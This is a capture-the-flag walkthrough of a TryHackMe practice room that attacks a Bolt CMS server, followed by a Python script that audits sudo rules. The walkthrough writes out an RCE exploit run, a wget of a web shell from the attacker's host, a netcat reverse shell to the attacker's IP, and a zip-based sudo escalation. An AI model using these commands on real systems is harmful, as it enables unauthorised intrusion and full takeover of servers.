Stefan Dorresteijn
[TryHackMe.com] Erit Securus I writeup

This writeup is the second in my TryHackMe writeup series. I've carefully been dipping my toes into pentesting lately and love to keep notes, so I figured I'd write them out.

This is a writeup for Erit Securus I

NB: I'm going to assume you're running Kali Linux and you're working from an empty folder you made for this room.

Task 2

As usual, we start by running an nmap scan against the box to find out which ports are open, what is running on those ports and which versions of those services are running. We save the results to a file. This gives us the answers to all of task #2.

mkdir scans
nmap -sC -sV -oN scans/nmap <IP>

Task 3 - 5

Let's take a look at the app we're going to be exploiting by opening the page in our browser. It looks like your average CMS. When we inspect the page in the browser, we can see exactly which CMS it's running. From a quick Google search we learn that the login page for this CMS lives under /bolt/login. We could brute force the login details for a user, but that's not really what this room is for. Just guess a couple of username/password combinations that would work for a very badly secured admin panel and I'm sure you'll get the right info.

We download the exploit from task #4 by running git clone https://github.com/r3m0t3nu11/Boltcms-Auth-rce-py in our project folder.

We'll open the exploit folder in our terminal by running cd Boltcms-Auth-rce-py and then we install the requirements with pip by running pip3 install -r requirements.txt.

We're now ready to run the exploit.

python3 exploit.py http://<IP> username password

After a while, the exploit lets us run commands on the server. The room instructions tell you to put some PHP code into a file, but I prefer to do this slightly differently. For stability, we're going to upload a web shell to the server. I like to use the p0wny shell, but you're free to use whatever feels good.

Let's download the PHP file and put it in our project folder. Then set up a Python web server using SimpleHTTPServer in a separate terminal window or tab (that module is Python 2; on a system with only Python 3 the equivalent is python3 -m http.server):

python -m SimpleHTTPServer

Now, in the exploit window, we're going to wget our shell.php file from our python server:

wget "http://<OUR IP>:8000/shell.php"

When we visit the shell file in the /files/ folder on the web app, we get a more stable shell that allows us to perform more commands. From here, we're going to download netcat so we can get a proper reverse shell going. Let's make netcat available on our HTTP server by linking it into our project folder. Run the following command in your project folder:

ln -s $(which nc) .

Then download it from the PHP shell and make it executable:

wget "http://<OUR IP>:8000/nc"
chmod +x ./nc

Now set up a listener on our own box:

nc -nvlp 4444

Then, from the PHP shell, run netcat so it connects back to our own IP:

nc -e /bin/sh <OUR IP> 4444

Congratulations, you now have a reverse shell on this server! Make sure to upgrade it to a proper bash shell once you have it, using Python:

python -c 'import pty;pty.spawn("/bin/bash")'

Task 6 - 9

Task 6 is pretty straightforward if you do exactly what the room tells you to do. You can't go wrong.

For task 7 we're going to run sudo -l once we're connected to the box over SSH. This shows us the answer to the question in task 7 and gives us valuable information on how we could escalate our privileges. The format of the answer to task 7 tells us that we can execute /usr/bin/zip as the jsmith user. When we visit the GTFOBins page for this binary we see that we can escalate to the jsmith user by running these commands:

TF=$(mktemp -u)
sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'

As the jsmith user, we run the same python command to upgrade our shell and then we take another look at what we're able to do using sudo by running sudo -l.

It seems we can run literally anything we want through sudo, all without a password, so just run sudo su to escalate to root. Now you're free to do anything you want on this server.
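As an added, defender-side illustration that is not part of the original writeup, the script below parses sudo -l output of the shape seen in tasks 7 and 8 and flags the two misconfigurations that let this box fall: a NOPASSWD rule for a binary that can hand the caller a shell (zip here), and an unrestricted ALL rule. The hostname, the www-data web user and the sample output are constructed, not taken from the room.

```python
import re
from dataclasses import dataclass

# Binaries that, run under sudo, let the caller spawn a shell as the run-as
# user (GTFOBins documents them). Only zip, the one this room uses, is listed.
SHELL_ESCAPE_BINARIES = {"zip"}

# One rule line of `sudo -l` output, e.g. "(jsmith) NOPASSWD: /usr/bin/zip"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$")

@dataclass
class Finding:
    runas: str
    command: str
    nopasswd: bool
    severity: str
    reason: str

def classify(command: str, nopasswd: bool) -> tuple[str, str]:
    # NOPASSWD on ALL is the worst case; a password-gated ALL is still high.
    if command == "ALL":
        return ("critical" if nopasswd else "high", "unrestricted sudo (ALL)")
    name = command.split()[0].rsplit("/", 1)[-1]  # basename of the binary
    if name in SHELL_ESCAPE_BINARIES:
        return ("high", f"{name} can execute a shell as the run-as user")
    return ("info", "review manually")

def audit_sudo_l(output: str) -> list[Finding]:
    """Parse `sudo -l` text and return one Finding per permitted command."""
    findings = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults / "User ... may run" header lines
        runas = m.group("runas").split(":")[0].strip()  # "(ALL : ALL)" -> ALL
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(", "):  # rules may list several commands
            severity, reason = classify(cmd.strip(), nopasswd)
            findings.append(Finding(runas, cmd.strip(), nopasswd, severity, reason))
    return findings

# Constructed sample output (hostname and web user are assumptions, not from the room).
SAMPLE_WWW_DATA = """\
Matching Defaults entries for www-data on erit-securus:
    env_reset, mail_badpass

User www-data may run the following commands on erit-securus:
    (jsmith) NOPASSWD: /usr/bin/zip
"""
SAMPLE_JSMITH = "User jsmith may run the following commands on erit-securus:\n    (ALL : ALL) NOPASSWD: ALL\n"
```

Run the audit against real sudo -l output (or the sudoers file rendered by visudo -c -f) and treat every critical or high finding as a rule to remove or tighten.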

Congratulations for finishing Erit Securus I!
